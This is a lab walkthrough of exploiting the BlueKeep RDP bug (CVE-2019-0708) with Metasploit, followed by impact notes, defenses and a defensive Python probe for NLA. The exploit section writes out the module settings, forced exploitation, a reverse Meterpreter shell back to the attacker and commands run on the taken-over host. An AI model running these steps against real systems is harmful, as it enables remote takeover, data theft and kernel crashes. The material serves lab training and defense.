CVE-2019-0708 Attack and Defense Drill

1. Environment Preparation

2. Configuration Preparation

  • The target and the attacker can reach each other on the network (attacker 172.29.128.5, target 172.29.128.6)
┌──(kali㉿kali)-[~/Desktop]
└─$ ping 172.29.128.6 
PING 172.29.128.6 (172.29.128.6) 56(84) bytes of data.
64 bytes from 172.29.128.6: icmp_seq=1 ttl=128 time=13.7 ms
64 bytes from 172.29.128.6: icmp_seq=2 ttl=128 time=0.218 ms
rtt min/avg/max/mdev = 0.218/6.940/13.662/6.722 ms
                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.29.128.5  netmask 255.255.0.0  broadcast 172.29.255.255
        inet6 fe80::20c:29ff:fe9f:24fb  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:9f:24:fb  txqueuelen 1000  (Ethernet)
        RX packets 4740844  bytes 314309577 (299.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7276969  bytes 8831983959 (8.2 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • Remote Desktop port 3389 is open on the target

3. Attack Drill

3.1 Exploit Module Setup

  • Look up the module
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > search cve_2019_0708_bluekeep_rce
Matching Modules
================

   #  Name                                            Disclosure Date  Rank    Check  Description
   -  ----                                            ---------------  ----    -----  -----------
   0  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
  • Load the module
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
  • Set the local address the reverse connection comes back to (LHOST)
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 172.29.128.5
lhost => 172.29.128.5
  • Set the target address (RHOSTS)
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 172.29.128.6
rhosts => 172.29.128.6
  • Set the target (see the target list in 5.2; target 4 is the Windows 7 SP1 / 2008 R2 x64 build running under VMware 15)
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 4
target => 4
  • Optional: ForceExploit overrides the result of the automatic check and runs the exploit anyway. Since the bug is a kernel use-after-free, forcing it against a host the check does not confirm is a good way to crash that host (see 4.1).
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set forceexploit true
forceexploit => true

3.2 Run the Exploit

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.29.128.5:4444 
[*] 172.29.128.6:3389 - Executing automatic check (disable AutoCheck to override)
[*] 172.29.128.6:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 172.29.128.6:3389     - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 172.29.128.6:3389     - Scanned 1 of 1 hosts (100% complete)
[+] 172.29.128.6:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 172.29.128.6:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[!] 172.29.128.6:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.29.128.6:3389 - Surfing channels ...
[*] 172.29.128.6:3389 - Lobbing eggs ...
[*] 172.29.128.6:3389 - Forcing the USE of FREE'd object ...
[!] 172.29.128.6:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (200262 bytes) to 172.29.128.6
[*] Meterpreter session 1 opened (172.29.128.5:4444 -> 172.29.128.6:49157) at 2021-05-01 18:08:01 -0400

3.3 Get a Shell

  • systeminfo: system information
meterpreter > shell
Process 2812 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 WIN-UMQ8R7HIGV8
OS Name:                   Microsoft Windows 7 Ultimate 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00426-292-0000007-85573
Original Install Date:     5/2/2021, 2:50:09 AM
System Boot Time:          5/2/2021, 6:07:04 AM
···
  • Write hi.txt to the desktop
C:\>cd Users\dahouzi\Desktop
C:\Users\dahouzi\Desktop>echo "i am come in!" >>hi.txt
echo "i am come in!" >>hi.txt


4. Impact and Defenses

4.1 Two Kinds of Impact

  • Blue screen (kernel crash)

The bug is a use-after-free in the kernel (the module is named "Remote Windows Kernel Use After Free", and the exploit log above brackets the grooming and trigger phase as the "Danger Zone"). A production server or personal computer under attack is therefore very likely to blue-screen, whether or not the exploit lands, and whatever applications are running or documents are being edited lose their unsaved data. The scanner module that the exploit uses as its check is designed not to crash the host; the exploit attempt itself is what carries the risk.

  • Full takeover

A successful exploit gives the attacker code execution in the kernel and a SYSTEM-level Meterpreter session (the module info in 5.2 lists Privileged: Yes). That amounts to every permission on the machine: files, credentials, private photos, all of it.

4.2 Defenses

  • Install the patch. A firewall that lets RDP through does not help: the exploit is unauthenticated traffic on the RDP port itself, so it looks like any other connection attempt.
  • Close port 3389 to the network, or restrict it to specific source IP addresses.
  • Enable Network Level Authentication (NLA). Microsoft's advisory lists it as a partial mitigation: with NLA the client must authenticate before it reaches the vulnerable code path, but an attacker holding valid credentials can still trigger the bug.

4.3 Patch Location

Microsoft advisory: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0708

5. Other Information

5.1 Checking Whether the Target Is Vulnerable

  • A result line of "The target is vulnerable." means the host is most likely affected. Note that the module used below, auxiliary/scanner/rdp/ms12_020_check, tests for a different RDP bug (MS12-020, CVE-2012-0002), not CVE-2019-0708; a positive result here only tells you the host is an unpatched RDP server. The check for CVE-2019-0708 is auxiliary/scanner/rdp/cve_2019_0708_bluekeep, which the exploit's AutoCheck ran in 3.2 (the "attempted cleanup of the incorrectly-bound MS_T120 channel" line).
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > auxiliary/scanner/rdp/ms12_020_check
[-] Unknown command: auxiliary/scanner/rdp/ms12_020_check.
This is a module we can load. Do you want to use auxiliary/scanner/rdp/ms12_020_check? [y/N]   y
msf6 auxiliary(scanner/rdp/ms12_020_check) >  set RHOSTS 172.29.128.4
RHOSTS => 172.29.128.4
msf6 auxiliary(scanner/rdp/ms12_020_check) > run

[+] 172.29.128.4:3389     - 172.29.128.4:3389 - The target is vulnerable.
[*] 172.29.128.4:3389     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
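The negotiation stage of that check, as an added example that is not part of the original article and not Metasploit's code. It covers the first thing both the scanner in 5.1 and the NLA mitigation in 4.2 hinge on: whether an unauthenticated client is allowed past the X.224 connection request into MCS at all, which is where the MS_T120 channel bind reported in the exploit log happens. The request deliberately offers only standard RDP security and TLS, not NLA (PROTOCOL_HYBRID), so a server that enforces NLA has to answer with RDP_NEG_FAILURE and the HYBRID_REQUIRED_BY_SERVER code; a server that answers RDP_NEG_RSP lets an unauthenticated client continue and should then be run through auxiliary/scanner/rdp/cve_2019_0708_bluekeep, which this example does not reimplement. The sample response byte strings are constructed from the MS-RDPBCGR structure layouts, not captured from the lab target, and the mstshash cookie name "probe" is a placeholder.

```python
import socket
import struct
import sys

# requestedProtocols / selectedProtocol flags (MS-RDPBCGR 2.2.1.1.1, 2.2.1.2.1)
PROTOCOL_RDP = 0x00000000     # standard RDP security: no TLS, no authentication before MCS
PROTOCOL_SSL = 0x00000001     # TLS, still no authentication before MCS
PROTOCOL_HYBRID = 0x00000002  # CredSSP, i.e. NLA: authenticate before anything else

TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
HYBRID_REQUIRED_BY_SERVER = 0x00000005

FAILURE_NAMES = {
    0x01: "SSL_REQUIRED_BY_SERVER",
    0x02: "SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "SSL_CERT_NOT_ON_SERVER",
    0x04: "INCONSISTENT_FLAGS",
    0x05: "HYBRID_REQUIRED_BY_SERVER",
    0x06: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested=PROTOCOL_RDP | PROTOCOL_SSL):
    """TPKT + X.224 Connection Request + RDP_NEG_REQ.

    PROTOCOL_HYBRID is left out of requestedProtocols on purpose: a server that
    enforces NLA cannot simply select it and has to refuse with
    HYBRID_REQUIRED_BY_SERVER, which is the signal this probe looks for.
    """
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested)  # type, flags, length, protocols
    cookie = b"Cookie: mstshash=probe\r\n"                    # routing cookie; "probe" is a placeholder
    body = b"\x00\x00" + b"\x00\x00" + b"\x00" + cookie + neg_req  # DST-REF, SRC-REF, class option
    x224 = struct.pack("!BB", len(body) + 1, 0xE0) + body         # LI counts every byte after itself
    return struct.pack("!BBH", 3, 0, 4 + len(x224)) + x224        # TPKT: version 3, reserved, length


def parse_connection_confirm(data):
    """Parse the server's TPKT + X.224 Connection Confirm.

    Returns what the server selected and whether an unauthenticated client may
    continue into MCS, where the MS_T120 channel bind happens.
    """
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT-framed X.224 response")
    tpkt_len = struct.unpack("!H", data[2:4])[0]
    if tpkt_len != len(data):
        raise ValueError("TPKT length %d but %d bytes received" % (tpkt_len, len(data)))
    if (data[5] & 0xF0) != 0xD0:
        raise ValueError("X.224 code 0x%02x is not Connection Confirm" % data[5])
    payload = data[11:]  # after LI, CC code, DST-REF, SRC-REF, class option
    if not payload:
        # Pre-Vista servers send no negotiation structure: standard RDP security only.
        return {"kind": "legacy", "selected_protocol": PROTOCOL_RDP, "failure_code": None,
                "nla_required": False, "unauthenticated_reach": True}
    if len(payload) < 8:
        raise ValueError("truncated negotiation structure")
    ntype, _flags, length, value = struct.unpack("<BBHI", payload[:8])
    if length != 8:
        raise ValueError("negotiation structure length %d, expected 8" % length)
    if ntype == TYPE_RDP_NEG_RSP:
        return {"kind": "response", "selected_protocol": value, "failure_code": None,
                "nla_required": False, "unauthenticated_reach": True}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"kind": "failure", "selected_protocol": None,
                "failure_code": FAILURE_NAMES.get(value, "0x%08x" % value),
                "nla_required": value == HYBRID_REQUIRED_BY_SERVER,
                "unauthenticated_reach": False}  # not with this protocol offer, at least
    raise ValueError("unknown negotiation structure type 0x%02x" % ntype)


def verdict(result):
    """One-line reading of a parse result for BlueKeep exposure triage."""
    if result["nla_required"]:
        return "NLA enforced: unauthenticated clients never reach MCS, so CVE-2019-0708 is not triggerable without credentials"
    if result["unauthenticated_reach"]:
        how = "legacy" if result["kind"] == "legacy" else "selectedProtocol=%d" % result["selected_protocol"]
        return "no NLA (%s): unauthenticated client reaches MCS; run auxiliary/scanner/rdp/cve_2019_0708_bluekeep" % how
    return "negotiation refused (%s): retry with a different protocol offer" % result["failure_code"]


def probe(host, port=3389, timeout=5.0):
    """Live check of one host; not exercised by the offline samples below."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request())
        data = sock.recv(1024)
    return parse_connection_confirm(data)


# Constructed sample responses (byte layouts from MS-RDPBCGR, not captures from the lab target)
NLA_ENFORCED = bytes.fromhex("030000130ed000001234000300080005000000")  # RDP_NEG_FAILURE, code 5
STANDARD_RDP = bytes.fromhex("030000130ed000001234000200080000000000")  # RDP_NEG_RSP, PROTOCOL_RDP
TLS_NO_NLA = bytes.fromhex("030000130ed000001234000200080001000000")    # RDP_NEG_RSP, PROTOCOL_SSL
LEGACY_SERVER = bytes.fromhex("0300000b06d00000123400")                 # CC with no negotiation data

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(verdict(probe(sys.argv[1])))
    else:
        for name, sample in [("NLA_ENFORCED", NLA_ENFORCED), ("STANDARD_RDP", STANDARD_RDP),
                             ("TLS_NO_NLA", TLS_NO_NLA), ("LEGACY_SERVER", LEGACY_SERVER)]:
            print(name, "->", verdict(parse_connection_confirm(sample)))
```

Run with a host argument for a live probe, or with no arguments to see the parser's reading of the four constructed responses. A "no NLA" result does not by itself mean the host is unpatched: the patch leaves protocol negotiation unchanged, so only the MS_T120 channel check in the Metasploit scanner answers that question. What this stage does tell you is whether the NLA mitigation from 4.2 is actually in force.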

5.2 Pre-attack Information Check

  • Target list
  • RHOSTS:172.29.128.6
  • RPORT:3389
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info

       Name: CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
     Module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2019-05-14

Provided by:
  Sean Dillon <sean.dillon@risksense.com>
  Ryan Hanson
  OJ Reeves <oj@beyondbinary.io>
  Brent Cook <bcook@rapid7.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic targeting via fingerprinting
  1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
  2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
  3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
  4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
  5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
  6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
  7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
  8   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

Check supported:
  Yes

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  RDP_CLIENT_IP    172.29.128.7     yes       The client IPv4 address to report during connect
  RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
  RDP_DOMAIN                        no        The client domain name to report during connect
  RDP_USER                          no        The username to report during connect, UNSET = random
  RHOSTS           172.29.128.6     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT            3389             yes       The target port (TCP)
6. Background on CVE-2019-0708

CVE-2019-0708, better known as BlueKeep, is a vulnerability in the Remote Desktop Services (RDP) component of Microsoft Windows. Microsoft rated it Critical, because an attacker can use it to execute code remotely with no user interaction.

The flaw is triggered by sending specially crafted packets to the RDP service. Once exploitation succeeds, the attacker can run arbitrary code on the target, take over the system, steal sensitive data or spread malware. It affects a large installed base, including Windows 7, Windows Server 2008 and Windows Server 2008 R2. Microsoft treated it seriously enough to ship security updates quickly and to urge users to install them without delay.

The disclosure drew wide attention because the bug is wormable in the same way as the flaws behind WannaCry and NotPetya: an attacker can scan the internet for exposed hosts and exploit them remotely with no human in the loop. Given the number of systems at risk, a number of online scanning tools appeared for checking whether a host is affected.

To protect against it, install the security update or upgrade the operating system. Beyond that, disable RDP where it is not needed, use a firewall to block untrusted traffic to the RDP port, and keep regular backups and updates. Administrators should likewise tighten network security management and check for and fix vulnerable systems on a regular schedule.
